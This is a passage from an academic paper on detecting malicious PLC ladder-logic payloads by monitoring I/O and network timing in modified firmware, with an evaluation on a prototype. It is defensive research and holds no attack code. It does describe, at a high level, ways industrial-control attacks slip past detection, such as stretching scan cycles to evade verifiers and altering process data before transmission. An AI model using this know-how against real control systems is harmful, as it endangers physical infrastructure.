B. PLC Ladder Logic

Many widely-used PLC programming languages are standardized in IEC 61131-3 [8], and ladder logic is the most commonly used one [9] since it is intuitive to control system engineers, who prefer to define control actions in terms of relay contacts and coils. Instructions specified by ladder logic have their own symbolic representation. A PLC payload program written in ladder logic has one or more ladder-formatted schematic diagrams. Within each diagram, ladder logic instructions are organized into rungs. Each rung may contain multiple ladder logic instructions, which are evaluated from left to right. Instructions on the left of a rung test input conditions or outputs generated by other rungs, and instructions on the right generate rung outputs. Multiple input condition checks can be placed in tandem, and the input logic evaluates to true if and only if all input conditions are true. Parallel branches can be used on a rung to accommodate more than one combination of input conditions. The rung logic evaluates to true as long as one of the branches forms a true logic path. When multiple output branches are present on a rung, a true logic path controls multiple outputs. Fig. 4 shows a sample subroutine of a ladder logic program consisting of three rungs.
[Fig. 3. PLC payload program execution model.]

[Fig. 4. A sample ladder logic program with three rungs.]

The XIC instruction on the first rung examines if an input is true. If so, the instruction evaluates to true. The OTE instruction energizes a specified output bit. The input condition of the first rung first checks if input bit I:0/4 or I:0/3 is true and then checks if bit I:0/0 is true. The output of this rung controls both output bits, i.e., O:2/1 and O:2/2. The second rung's input condition is always true, so the subroutine in file U:7 is executed. Note that the subroutine is essentially another ladder logic diagram. When the subroutine returns, the second rung completes and the third rung is evaluated, which signals the end of the payload program. Note that hierarchical addressing is used in a ladder logic program to specify the data type, slot number, and bit position of PLC data and peripherals [9]. For example, I:0/4 is the fifth bit of binary input slot 0 (with the first bit being I:0/0). For analog I/Os, the hierarchical address is slightly different. For example, O:2.0 is an analog output on the output module installed on slot 2, and the output value is written to the first (zero-indexed) word of its allocated memory. Ladder logic provides a wide range of instructions for PLC engineers to specify control actions. Bit instructions examine the status of an individual input/internal bit or control a single output bit. Word instructions, such as mathematical operations, data transfer, and logical operations, operate on data words or registers.
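As an illustration of the rung evaluation rules just described (parallel input branches OR together, series contacts AND together, and a true logic path drives every output branch), the first rung of Fig. 4 could be sketched in C as below. The function name is ours for illustration and is not part of any PLC firmware:

```c
#include <stdbool.h>

/* Sketch of the first rung of Fig. 4: the parallel branch (I:0/4 OR I:0/3)
 * is in series with the contact I:0/0; a true logic path energizes both
 * output branches O:2/1 and O:2/2 via OTE. */
void eval_rung1(bool i0_4, bool i0_3, bool i0_0, bool *o2_1, bool *o2_2)
{
    /* Parallel branches OR together; series contacts AND together. */
    bool true_path = (i0_4 || i0_3) && i0_0;
    *o2_1 = true_path;   /* first OTE output branch  */
    *o2_2 = true_path;   /* second OTE output branch */
}
```

Evaluating the function with I:0/4 energized and I:0/0 energized drives both outputs, whereas de-energizing I:0/0 breaks the series path regardless of the parallel branch.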
Program control instructions, such as subroutine invocation and return, control the execution flow of the payload program. For the control program of a large and complex ICS, subroutines are frequently used to better organize the instructions and enhance maintainability. In addition, communication instructions allow a PLC to communicate with other hosts via a particular ICS network protocol. From the perspective of PLC control program development, a malicious payload is essentially a combination of legitimate PLC programming instructions causing disastrous impacts on an ICS. In this paper, we focus on detecting payload attacks implemented via ladder logic, but the proposed techniques are applicable to attacks written in other languages [8] as well because different PLC programming languages can be used to implement the same control system specifications [9].

C. Firmware vs. Payload Attacks

As revealed by Fig. 2, both the PLC firmware and its payload program can become the target of cyber attacks. An attacker can reverse-engineer and modify the firmware on a PLC to launch firmware attacks. In this case, even though a legitimate payload program is downloaded to the PLC, its execution will still be monitored and/or intercepted by the modified firmware. In [10], a rootkit is developed on the CODESYS PLC runtime to intercept I/O operations of the payload program. When the payload wants to read or write a certain I/O pin, an interrupt handler installed by the attacker is called first, within which the attacker can reconfigure the I/O pins or modify the values to be read/written. In [6], a more advanced rootkit is developed for an Allen-Bradley CompactLogix PLC firmware. In addition to intercepting PLC inputs and outputs at the firmware, it incorporates physical-process awareness and always presents modified sensor measurements, deceiving the ICS operator in front of the HMI into thinking that the system runs normally.
Firmware attacks typically require detailed knowledge of the target PLC's hardware components and reverse-engineering of its firmware because PLCs are closed-source embedded devices [11]. An attacker needs to install the rootkit on PLCs either via the built-in remote firmware update mechanism or by loading it via the JTAG interface [6]. For a firmware update process protected by cryptographic means (e.g., a certificate in the X.509 standard), it is hard to install a modified version of the firmware on the PLC. Alternatively, an attacker can load modified PLC firmware via the JTAG interface. However, such an approach will require physical access to the PLC and possibly disassembling it. PLC payload attacks, on the other hand, are much easier to launch. An insider with proper privileges (e.g., a disgruntled control system engineer) can easily download a malicious payload program. As shown in Fig. 1, such an insider may download a malicious payload program via the engineering workstation to one or multiple PLCs. Integrity checks on the PLC payload program cannot effectively prevent such attackers from downloading malicious payload because warnings on payload program changes can always be overridden once proper privileges are acquired (e.g., a password allowing engineers to repeatedly download revised payload programs for development and debugging purposes). Alternatively, sophisticated cyber attacks, such as Stuxnet [2], [3], may include a payload attack as a component to induce physical damage on an ICS. Partial knowledge of the physical process can be sufficient to create a malicious payload using automated tools such as SABOT [5]. In [4], a small-scale challenge shows that malicious code snippets are likely to evade the scrutiny of code reviewers. Therefore, it is necessary to develop automated payload attack detection mechanisms to protect physical infrastructure from PLC payload attacks.

D.
Payload Attack Detection

As payload attacks can easily be launched by insiders or from compromised engineering workstations, several techniques that detect payload attacks have been proposed. In [12], a bump-in-the-wire device, called PLC guard, is introduced to intercept the communication between an engineering workstation and a PLC, allowing engineers to review the code and compare it against previous versions. Features of the PLC guard include various levels of graphical abstraction and summarization, which make it easier to detect malicious code snippets. In [13], an external runtime monitoring device (e.g., a computer or an Arduino microcontroller board) sits alongside the PLC, monitors its runtime behaviors (e.g., inputs, outputs, timers, counters), and verifies them against ICS specifications converted from a trusted version of the PLC payload program and written in interval temporal logic. It is shown that functional properties of a payload program can be verified against ICS specifications, but the types of payload attacks that can be detected by this approach remain to be explored. In [14], [15], a trusted safety verifier is introduced as a bump-in-the-wire device that automatically analyzes the payload program to be downloaded onto a PLC and verifies whether critical safety properties are met using linear temporal logic. However, linear temporal logic implicitly assumes that states of the system are observed at the end of a set of time intervals. In the case of a PLC payload program, a snapshot of system states is taken at the end of each program scan cycle. As a result, real-time properties that do not span multiple program scan cycles cannot be checked by the trusted safety verifier.
For example, a legitimate payload program is required to energize its output immediately when a certain input pin is energized. An attacker can inject malicious code and prolong the program scan cycle to cause a real-time property violation while evading code analytics based on linear temporal logic. In [16], the timer on-delay (TON) ladder logic instruction is modeled using linear temporal logic. The TON instruction starts a timer when its input condition evaluates to true and energizes its output (i.e., the Done bit) when the timer reaches the preset value. It is shown in [16] that TON behavior can be approximated with the combination of liveness and fairness properties: Either the TON instruction is not used or the TON output bit will eventually be energized. However, linear temporal logic cannot verify whether the TON output bit is energized at the exact program scan cycle designated by control system engineers. Therefore, such an approximation does not capture critical real-time requirements of ICS. In this paper, we introduce runtime behavior modeling and monitoring of PLC payload in PLC firmware. Our proposed approach complements existing detection techniques and can detect violations of ICS real-time properties. In addition, our proposed approach does not require the introduction of any external apparatus that may introduce new vulnerabilities into the ICS.

E. Runtime Behavior Monitoring for Anomaly Detection

The idea of detecting abnormal program behaviors by monitoring execution at runtime has been applied to a rich array of computer systems. Runtime behavior monitoring techniques on operating systems such as Windows, Linux, and Android are reviewed in [17], [18]. However, these techniques cannot be directly applied to PLCs since PLCs are closed-source systems [11] running specialized firmware and payload programs. System calls utilized by existing techniques are not available in PLC systems.
In [19], a runtime anomaly detector hardware design is proposed for embedded systems, which eliminates performance overheads incurred by software-based runtime monitoring methods. In [20], a timing-based PLC program anomaly detector is designed. An external data collector is deployed to collect program execution time measurements and detect unauthorized modifications to the PLC system. In [21], runtime behaviors are monitored via dedicated hardware performance counters, which are not widely available in microcontrollers utilized by PLCs. To detect payload attacks in existing ICS, a runtime behavior monitoring technique must utilize only the resources available on microcontrollers used in existing PLCs and must not require external apparatus (e.g., the data collector proposed in [20]).

TABLE I. CONTROL SYSTEM SPECIFICATIONS VS. LEGITIMATE PLC CONTROL LOGIC
Control System Specification | Legitimate Control System Logic
Digital I/O pins, values & functionality | Control logic of binary inputs and outputs
Analog I/O pins, value ranges, & functionality | Sensor output and actuator input ranges; control logic of analog I/Os
Legitimate sequences and timing relationships of I/O operations | Control logic of I/Os, possibly controlled by counters and timers
Network data packets and timing relationships | Data from network for local control tasks or data required by remote hosts (e.g., HMI or other networked PLCs), and real-time requirements for these network events
Network commands and timing relationships | Control tasks mandated by operator workstation and their real-time requirements

III. SYSTEM OVERVIEW

A. Adversary Model

A malicious payload may be directly downloaded by an insider with PLC programming privilege. For instance, the insider can be a PLC programmer responsible for deploying a tested PLC payload program. However, he/she downloads a different payload, which may be written anew or modified from the tested version.
Since such an attacker has proper privilege to program PLCs, integrity checks on the PLC payload program can be overridden and will not prevent malicious payload from being downloaded. For an external attacker, security flaws of other ICS components may be exploited to gain access to an engineering workstation, which allows him/her to download malicious payload. For example, in the Stuxnet attack [2], many potential attack vectors, including the PLC programming environment, are exploited to eventually compromise a PLC-connected engineering workstation. We assume that the attacker is not capable of changing the PLC firmware, which would require either attacking the cryptographically protected firmware image or loading modified firmware directly via the JTAG interface. Therefore, the firmware-level detection mechanism proposed in this paper cannot be tampered with by the attacker. The goal of a payload attack is not limited to blocking legitimate outputs, causing system interruption, and destruction of system equipment. Sophisticated attacks such as the PLC blaster worm [22], which replicates itself to other PLCs, can also be launched. However, such attacks download a payload program that is significantly different from the legitimate version in terms of program size and functionality, which can be identified by a human operator monitoring the control system. In this paper, we consider stealthy payload attacks that are modified from legitimate payload programs. Such attacks preserve certain legitimate payload properties (e.g., always sending sensor readings requested by the HMI) while carrying out malicious tasks.

B. PLC Program Development Process and Control System Specifications

To develop a PLC payload program for an ICS, the following process is typically adopted by PLC engineers:

1) Specification Formulation. Control tasks to be carried out by a PLC are identified and input/output signals required by these tasks are defined.
The logical sequence of operations for the PLC is specified, e.g., in the form of a sequence table, flow chart, or relay schematic [9].

2) PLC Program Development. At this step, the PLC program is developed based on the formulated specifications. Although an engineering team usually has its own set of guidelines and best practices on program organization and documentation, the generated PLC payload always aims to accurately implement the specifications. At this stage, an attacker (e.g., a disgruntled control system engineer) may collect the legitimate payload program and modify it to generate malicious payload.

3) Testing. Before deploying the PLC program, PLC engineers need to test the program via simulation or under some test environment. Safety properties (e.g., a circuit breaker must trip if a fault is detected) can be provided by system operators and/or identified during specification formulation. In addition, different combinations of input values are fed to the PLC to ensure that correct responses are taken under different system operation scenarios. Although the test cases may not be exhaustive (e.g., it is hard to implement all test cases when analog inputs are used), important system properties, such as safety and real-time requirements, should always be validated.

4) Maintenance. After an initial version of the PLC control program is deployed, the ICS may go through hardware upgrades and design improvements. Accordingly, the specifications should be updated and the PLC program should be revised. After necessary testing, the new payload is downloaded to the PLC.

In this paper, we assume that control system specifications, such as the number of I/Os, the functionality of each I/O pin, and the possible ranges of I/O values, are available.
Such specifications are usually provided by the control system engineering team that develops the legitimate payload program. Table I summarizes the control system specifications required by our detection mechanism and the corresponding legitimate control system actions. For instance, when designing the legitimate payload, a digital output pin may be used to control a circuit breaker to trip. The engineering team knows whether a 0 or a 1 corresponds to the trip signal, so it is straightforward to generate control system specifications describing the functionality of this output pin. To implement control operation sequences (e.g., tripping a circuit breaker and then re-closing it), timers and counters are generally used. When the legitimate payload program is created, timers and counters must be properly configured to control the temporal behaviors of the payload program. These configurations can then be converted into timing relationships among I/O and network events.

C. Payload Attack Detection at PLC Firmware

Using control system specifications, a runtime behavior model of the legitimate PLC payload program is established and stored in the PLC firmware. The timing relationships between inputs and outputs, the number of network packets generated after different control actions, as well as timing relationships between I/O and network events, are modeled.

[Fig. 5. PLC wiring diagram with sample control system specifications for I/O and network events. Note that wiring of I/O terminals is simplified (the digital ground terminal as well as terminal pairs for each analog I/O are not shown).]

By modifying the PLC firmware, runtime behaviors of the payload program (e.g., I/O and network access patterns) are time-stamped and compared against the established runtime behavior model. In addition, a backup version of the output image table is separately stored by the firmware at the beginning of each program scan cycle. If a certain abnormal runtime behavior is detected, the backup output image table is loaded to overwrite the output generated by the payload. As a result, any output related to the detected abnormal runtime behavior will not affect the physical system. For PLC payload sending/receiving network packets, network requests are also blocked when a runtime behavior anomaly is detected by the firmware.

IV. SYSTEM DESIGN

A. PLC Payload Runtime Behavior Model

Given the control system specifications, it is possible to create a runtime behavior model for legitimate PLC payload. Suppose that we need to create control system specifications for the PLC shown in Fig. 5. In this figure, sample specifications for the I/O terminals and the network port are provided. We note that timing relationships are not shown in Fig. 5. The information categorized in Table I allows us to create the runtime behavior model as follows: First, the number of (analog and digital) I/Os and their feasible values are determined. For instance, for digital input I:0/0 in Fig. 5, its legitimate values are 1 and 0. For analog input I:1.0 (note that the notation for analog I/Os is different from that for digital I/Os, as mentioned in Sec. II-B), the legitimate value ranges are 0-3 V and 12-15 V. In the PLC firmware, such information can be stored as a table (see Fig. 6 for an example), with each row storing the legitimate values/ranges of a particular pin. We call this table the I/O event table. Next, the number of network packets received or sent by the legitimate payload is extracted from the specifications.
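A minimal C sketch of how such an I/O event table might be laid out in firmware, using the Fig. 5 values. The struct layout, two-range limit, and function names are illustrative assumptions, not the paper's actual implementation:

```c
#include <stdbool.h>

/* One row of the I/O event table: up to two legitimate ranges per pin
 * (a digital pin uses two degenerate ranges, [0,0] and [1,1]). */
typedef struct {
    const char *pin;   /* hierarchical address, e.g. "I:1.0" */
    float lo1, hi1;    /* first legitimate range  */
    float lo2, hi2;    /* second legitimate range (lo2 > hi2 means unused) */
} io_event_row;

static const io_event_row io_event_table[] = {
    { "I:0/0",  0.0f,  0.0f,  1.0f,  1.0f },  /* digital: 0 (LOW) or 1 (HIGH) */
    { "I:1.0",  0.0f,  3.0f, 12.0f, 15.0f },  /* analog: 0~3 V or 12~15 V     */
    { "O:3.0", 12.0f, 15.0f,  1.0f,  0.0f },  /* analog: 12~15 V only         */
};

/* A value outside every legitimate range is an abnormal runtime event. */
bool io_value_legitimate(const io_event_row *row, float v)
{
    if (v >= row->lo1 && v <= row->hi1)
        return true;
    if (row->lo2 <= row->hi2 && v >= row->lo2 && v <= row->hi2)
        return true;
    return false;
}
```

For instance, 2.5 V on I:1.0 falls in the 0-3 V range and is legitimate, while 7 V falls between the two ranges and would be flagged as an abnormal runtime event.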
Since the PLC payload program is designed to control a physical process, network packets are typically associated with specific I/O conditions. For instance, when an alarm signal is energized to sound a horn, the same alarm signal is usually transmitted via a network packet to the HMI at the same time. When a process data request from the HMI is received, the PLC generates process data response(s) to transmit the requested data.

[Fig. 6. A sample runtime behavior model established based on the control system specifications in Fig. 5. The model consists of two tables and a sparse matrix.]

In the PLC firmware, network event information can be stored as a table with two rows (see Fig. 6 for an example). The first row lists the numbers of network packets that can be received, and the second row lists those that can be sent. We call this table the network event table. Using the I/O and network event tables, we are able to model the legitimate runtime behaviors of I/Os and network port(s) at any particular time instant. Then, timing relationships between inputs, outputs, and network accesses are established. To store these relationships, a sparse matrix is created in the PLC firmware (see Fig. 6 for an example). We call this sparse matrix the timing behavior matrix. Both the rows and the columns of the matrix are indexed by legitimate I/O and network operations. For instance, the I:0/0:1 event in the matrix in Fig. 6 represents the I/O event where digital input pin I:0/0 is set to HIGH.
Each column of the matrix represents a particular payload program action, whereas the rows with non-zero values represent its preconditions. For instance, the matrix in Fig. 6 indicates that there are four preconditions under which a network packet will be generated and sent by a legitimate PLC payload. Note that the non-zero values in the matrix represent the maximum time (in microseconds) within which a column event will occur. Once all information provided in the control system specifications is converted into a runtime behavior model, three tables are stored into the PLC firmware (i.e., the I/O event table, the network event table, and the timing behavior matrix). These tables will only be updated if changes to the control system specifications are made (e.g., additions of new sensors/actuators). When a PLC payload is downloaded to a PLC, the PLC firmware assumes that its runtime behaviors match the ones specified in the supplied control system specifications. Any deviation from the encoded runtime behavior model will be regarded as an anomaly.

B. Payload Attack Detection at PLC Firmware

Our detection scheme introduces runtime behavior monitoring into the PLC firmware and compares the runtime behaviors of the currently deployed payload against the runtime behavior model established from control system specifications. To implement the proposed detection scheme, the following modifications to the PLC firmware are incorporated:

1) Logging Access to Input and Output Images: As introduced in Sec. II-A, the input image is updated before each run of the payload program, and the output image is updated after each run. In existing PLC firmware, I/O reads move values from the input/output image to a designated memory location. When an output pin is written, the value stored in a memory location is moved to the output image table.
To receive/send a packet, the receive/transmit queue is either explicitly (via a ladder logic instruction) or implicitly (at the end of the housekeeping phase) queried. To monitor the I/O and network access patterns, we modify the implementation of the PLC firmware to log the system time-stamp of these operations. This can be achieved by setting up the memory protection unit (MPU) to enter an interrupt when the user program accesses the input/output images or the network queues. In existing PLC firmware, a separate system timer is typically supported. This timer provides the time-stamps for the I/O and network events to be monitored. If the I/O images are accessed, the interrupt handler decodes the I/O pin address and logs the time-stamp of the operation. Suppose that the same input pin is accessed multiple times during a single program scan cycle; only the time-stamp of the first read operation is logged. For an output pin, both the first read and the last write operations are time-stamped. For access to network queues, the number of packets received/sent is logged and time-stamped. Time-stamps of I/O and network operations are stored in a separate table (known as the runtime time-stamp table) in the PLC firmware. Each entry of the table corresponds to a particular I/O event (e.g., a legitimate I/O value is observed) or network event (e.g., a legitimate number of packets are sent). In our current implementation, the maximum number of time-stamps logged by the runtime time-stamp table is 10 for each I/O event. If more than 10 time-stamps are collected, newly generated time-stamps will be discarded. We log the time-stamp for the first I/O read operation and the last output operation within each program scan cycle because control system specifications typically use the observation of an I/O value on the physical process as a precondition. Take the output pin O:2/8 in Fig. 5 as an example.
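The first-read-per-cycle logging policy with the 10-entry cap described above can be sketched in C as follows. The names and the fixed-size log are our assumptions; in the actual firmware, this logic would run inside the MPU interrupt handler with time-stamps taken from the system timer:

```c
#include <stdint.h>

#define MAX_TS 10   /* per-event cap from the text: at most 10 pending stamps */

/* Per-event entry of the (hypothetical) runtime time-stamp table. */
typedef struct {
    uint64_t ts[MAX_TS];
    int count;            /* pending time-stamps                  */
    int reads_this_cycle; /* reads seen in the current scan cycle */
} ts_log;

/* Called on an input-image read: only the first read of the pin within a
 * program scan cycle is stamped; once the table is full, newly generated
 * time-stamps are discarded. */
void log_input_read(ts_log *log, uint64_t now_us)
{
    if (log->reads_this_cycle++ > 0)
        return;                          /* not the first read this cycle */
    if (log->count < MAX_TS)
        log->ts[log->count++] = now_us;  /* else: discard the new stamp   */
}

/* Reset the per-cycle counter at the start of each program scan cycle. */
void begin_scan_cycle(ts_log *log)
{
    log->reads_this_cycle = 0;
}
```

An output pin would need a second stamp slot for its last write, updated on every write so that only the final value's time-stamp survives the cycle.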
Even if the payload program operates on O:2/8 multiple times during a program scan cycle, it is the last value written into the output image that actually takes effect. For each legitimate network event, our current implementation logs a maximum of 20 time-stamps. Newly collected time-stamps are discarded if there are already 20 time-stamps pending in the table.

2) Validating Runtime Behaviors: When time-stamping I/O and network events, any event that is not included in the I/O and network event tables is regarded as an abnormal runtime event. In addition, a separate sparse matrix (known as the runtime sparse matrix) is created and maintained in the PLC firmware to keep track of the timing relationships at runtime. The sparse matrix is also updated in the MPU interrupt handler. Runtime behaviors specified in the timing behavior matrix are validated in the output scan phase before the values in the output image are transferred to external output terminals. If any of the preconditions specified by the runtime behavior model are met, the timing relationships are checked. If an event occurs but none of its preconditions are active, a runtime behavior anomaly is detected. Take the timing behavior matrix in Fig. 6 as an example. Suppose that during a program scan cycle, we observe two occurrences of the event Send:1. For the first time-stamp of Send:1, we check all the time-stamps for its preconditions. If any of the timing relationships is met, the corresponding entry in the runtime sparse matrix is cleared. In the runtime time-stamp table, the oldest time-stamp for the corresponding precondition event is removed.

[2018 IEEE Conference on Communications and Network Security (CNS). Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply.]
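The per-occurrence precondition check described above, including the clearing of the oldest pending precondition time-stamp, can be sketched as follows. This is a simplification of the firmware logic, with assumed event names and bounds.

```python
def validate_event(event_ts, rules, pending, anomalies):
    """Check one event occurrence against its preconditions.

    rules:   {precondition event: max delay in microseconds}
    pending: {event: list of pending time-stamps, oldest first}
    If some precondition has a pending time-stamp within its bound, consume
    the oldest one and accept; otherwise record a runtime behavior anomaly.
    """
    for pre, max_us in rules.items():
        stamps = pending.get(pre, [])
        if stamps and 0 <= event_ts - stamps[0] <= max_us:
            stamps.pop(0)              # clear the oldest precondition stamp
            return True
    anomalies.append(event_ts)         # no active precondition: anomaly
    return False

anomalies = []
pending = {"recv:req": [100]}   # hypothetical precondition seen at t = 100 us
rules = {"recv:req": 500}       # response packet must follow within 500 us
ok = validate_event(400, rules, pending, anomalies)    # within the bound
late = validate_event(700, rules, pending, anomalies)  # queue now empty
```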
If a violation of the timing relationship is detected, a runtime behavior anomaly is found and the execution of the payload program should be terminated. Then, for the second time-stamp of Send:1, previously cleared precondition fields are set if the corresponding entries in the runtime time-stamp table have pending time-stamps. The timing relationships for Send:1 are then validated again.

3) Backing Up the Output Image: At the beginning of each program scan cycle (i.e., in the input scan phase), a backup version of the output image table is separately stored by the PLC firmware. The values in this backup image are simply the outputs of the preceding program scan cycle. If a runtime behavior anomaly is detected in the current program scan cycle, the backup image is used to overwrite the output image generated by the payload program. In this way, output values corresponding to illegitimate payload program behaviors are blocked.

4) Canceling Network Send/Receive Requests: There are two scenarios in which network send/receive requests generated by ladder logic instructions are processed. First, network send/receive requests generated by a payload program are normally processed in the housekeeping phase. To block these packets, we modify the firmware so that all pending network requests are cleared in the output scan phase if a runtime behavior anomaly is detected. Alternatively, a subset of network-related ladder logic instructions can request the PLC firmware to service pending network tasks immediately. To prevent such network access, the implementation of the MPU interrupt handler is further modified to check the preconditions of requested network operations. Suppose that a network-related ladder logic instruction is executed; after the network requests are generated (e.g., four packets will be retrieved from the receive queue), the firmware first enters the MPU interrupt handler and checks the preconditions of the requested network event.
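The backup-and-restore step for the output image can be sketched as a minimal Python model (an assumed structure in which the output image is a plain list of pin values, not the paper's firmware code):

```python
class ScanCycle:
    """Sketch of the output-image backup step described above."""

    def __init__(self, output_image):
        self.output_image = output_image
        self.backup = None

    def input_scan_phase(self):
        # Back up the outputs produced by the preceding program scan cycle.
        self.backup = list(self.output_image)

    def output_scan_phase(self, anomaly_detected):
        # On anomaly, restore the backup so that illegitimate output values
        # never reach the external output terminals.
        if anomaly_detected:
            self.output_image[:] = self.backup
        return self.output_image

cycle = ScanCycle([0, 1, 0])
cycle.input_scan_phase()
cycle.output_image[1] = 0     # payload writes (possibly malicious) outputs
cycle.output_image[2] = 1
result = cycle.output_scan_phase(anomaly_detected=True)
```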
If any of the preconditions is met yet the corresponding timing relationship is violated, the network requests will not be executed because a runtime behavior anomaly is detected. It should be noted that our proposed detection scheme can easily be customized to notify ICS operators of the detection of PLC payload attacks. Suppose an on-site operator is to be notified: an extra output pin can be energized to set up an alarm during the output scan phase when runtime behaviors are examined. It is also possible to send out an alarm message to a remote HMI during this phase after the runtime behavior validation is done.

[Fig. 7. Maximum memory utilization of unmodified and modified PLC firmware running PLC payload programs with different numbers of utilized analog outputs.]

V. EVALUATION
We implement the proposed payload attack detection method on Texas Instruments TM4C12x ARM Cortex-M4F core-based microcontrollers. Payload attacks are written in ladder logic, which is converted into machine code and loaded onto the PLC prototype. The hardware resources of the chosen microcontroller series are the currently active equivalents of the microcontrollers used by existing PLCs [6]. A memory protection unit (MPU) and a system timer are available to implement our proposed detection scheme. Runtime behavior data collected by the PLC firmware is read from a Universal Asynchronous Receiver/Transmitter (UART) module connected to a PC. We first evaluate the overhead of implementing the proposed detection mechanism and then its detection performance.

A. Memory Overhead
The memory overhead of implementing the proposed detection method comes from both the firmware and payload levels. In the PLC firmware, the runtime behavior model converted from control system specifications needs to be stored.
Extra tables and a sparse matrix are required to time-stamp and keep track of the runtime behaviors of the currently deployed payload. The sizes of these matrices and tables grow as the number of I/O and network events specified in the control system specifications grows. In addition, an interrupt handler for the MPU as well as initialization code for the system timer and MPU need to be added to the PLC firmware. In our prototype, these firmware modifications translate to about 200 lines of assembly code (compared to the unmodified PLC firmware with about 6000 lines of assembly code). To evaluate whether the memory overhead of our proposed detection mechanism is acceptable, we create payload programs utilizing different numbers of I/Os and generating different numbers of network packets. Note that each of these payload programs generates two types of network events (i.e., sending two packets or receiving one packet within each program scan cycle) and utilizes 16 digital I/Os. The number of analog outputs utilized by these payload programs varies from 0 to 16.

[Fig. 8. Maximum execution time of PLC programs with different numbers of utilized analog outputs. All payload programs are executed on both unmodified and modified PLC firmware.]

[Fig. 9. Sample power substation protection system implemented by multiple PLCs (medium- or high-voltage bus, voltage and current sensors, circuit breakers, primary transformer with a dedicated protection PLC, and three feeder protection PLCs serving Loads 1-3). Note that our PLC prototype only emulates PLC A.]
Each analog output has two legitimate value ranges. The timing relationships in the control system specifications all describe preconditions for analog outputs. These payload programs are then loaded onto our PLC prototype twice: first, the unmodified PLC firmware is used to execute the payload programs and the maximum sizes of the PLC firmware in RAM are logged; then, the PLC firmware with our payload detection mechanism is used and the maximum firmware sizes are recorded again. Fig. 7 shows the memory overhead of implementing our PLC payload attack detection method in our PLC prototype. For a PLC system with 16 analog outputs, the memory overhead (compared to unmodified PLC firmware) is about 1 kB, which translates to a 3% increase in memory size. This memory overhead is acceptable for existing PLC systems on the market, which typically have more than 32 kB of memory [9].

B. Execution Time Overhead
A PLC payload program needs to satisfy execution time requirements in order to control the physical process correctly. If a program scan cycle takes too long to complete, the PLC will not be able to track the changes of the physical process and generate control outputs in a timely manner. Since our payload detection mechanism incorporates runtime behavior monitoring and validation in the PLC firmware, it is necessary to ensure that the execution time of the program scan cycle does not significantly increase.

TABLE II. ATTACK INSTANCES IMPLEMENTED ON PLC PROTOTYPE
- Illegitimate analog inputs (Group 1, 5 instances): Scaling factors of analog input modules are modified by attacker(s) to generate out-of-range input values.
- Illegitimate network events (Group 2, 5 instances): When trip coils are energized, the attack payload sends process data to multiple pre-specified destinations. When a process data request is received, a packet containing intentionally modified process data is sent.
- Illegitimate I/O event timing (Group 3, 5 instances): Trip coils are not energized within 1000 µs when a voltage/current fault is detected.
- Illegitimate network event timing (Group 4, 5 instances): A packet containing up-to-date process data is not sent within 500 µs after a process data request is received.

TABLE III. ATTACK INSTANCES AND DETECTION RESULTS
Each row lists one attack instance (Group/ID) and its 10 runs, with X marking a run in which the attack was detected. Every instance is detected in all 10 runs (XXXXXXXXXX), except instance 2/2, which is detected in only 6 of its 10 runs (XXXXXX).

To evaluate the execution time overhead of the proposed detection mechanism, we measure the execution time of the payload program instances created in Sec. V-A. Each payload program is executed for 1,000 program scan cycles on both unmodified and modified PLC firmware. Note that we added six extra assembly instructions in the PLC firmware to drive an extra output pin of the prototype PLC: at the beginning of each program scan cycle, this pin is set to HIGH; at the end of each program scan cycle, it is set to LOW. Fig. 8 shows the maximum execution time of the payload program instances. The average increase in maximum execution time is about 65 µs, which is far below the typical execution time of PLC payload programs (e.g., 1-10 ms [9]).

C. Detection Performance
To evaluate the detection performance of our proposed method, our PLC prototype emulates PLC A shown in Fig. 9. To implement the protection tasks assumed by PLC A, four analog inputs and two digital outputs are utilized. Our control system specifications require that both circuit breakers are tripped within 1000 µs once a voltage/current fault is detected on either side of the transformer.
In addition, when a process data request (sent by a PC emulating an HMI) is received, a packet containing up-to-date current and voltage readings must be sent within 500 µs. We create 20 different payload attack instances, which can be categorized into the four groups described in Table II. Each payload attack instance is executed 10 times (each run consisting of 1,000 program scan cycles). Table III shows the detection results when running the payload attacks on the modified PLC firmware. 19 out of the 20 payload attack instances can always be detected during our evaluation, which shows that our proposed detection mechanism can help prevent PLC payload attacks without introducing external apparatus. One of the attack instances (Group 2, Instance 2) cannot always be detected. This attack instance either generates illegitimate outputs or transmits modified process data as network packets. When it sends network packets, it simply modifies the process data values stored in memory before they are encapsulated. The preconditions of network events are still met and the timing relationships are not violated. Although this attack instance can sometimes evade our detection, it can be easily identified by existing detection methods against false data injection attacks [23].

VI. DISCUSSION
In this paper, we propose incorporating runtime behavior monitoring and establishing runtime behavior models from control system specifications to detect PLC payload attacks. Although our evaluations show that it is feasible to implement our proposed method in existing PLC firmware and achieve good detection performance, we note that further enhancements to the proposed method are possible.
For instance, it is possible to encode correlations between I/O events at certain time instants during the program scan cycle (e.g., by identifying legitimate I/O combinations in the runtime behavior model). However, such an enhancement would require overly detailed control system specifications. Control system engineers may not be aware of all the legitimate I/O combinations when creating the PLC payload program. Furthermore, the memory and execution time overhead of such an enhancement would also increase. Therefore, it remains to be further evaluated whether other runtime behavior specifications should be included in our model. Our current implementation focuses on payload attack detection rather than mitigation. Although outputs and network packets related to abnormal control logic are blocked, the operations of the ICS may still be affected. As future work, we will devise better mitigation strategies for ICSs with different mitigation resources.

VII. CONCLUSION
In this paper, we propose the detection of PLC payload attacks via runtime behavior monitoring in PLC firmware. Through modeling and monitoring the runtime behaviors, our proposed firmware enhancements can detect abnormal runtime behaviors of malicious payloads. Using our proof-of-concept PLC prototype, we show that the proposed approach can identify a wide variety of PLC payload attacks revealed by prior research. In addition, our evaluations show that the execution time and memory overhead of the proposed detection mechanism are acceptable for existing PLC firmware. Our proposed approach complements existing bump-in-the-wire solutions in that it can detect payload attacks that violate real-time requirements of ICS operations.

ACKNOWLEDGMENT
This work is supported by the U.S. Department of Energy (DoE) under Award Number DE-OE0000779.
Summary:
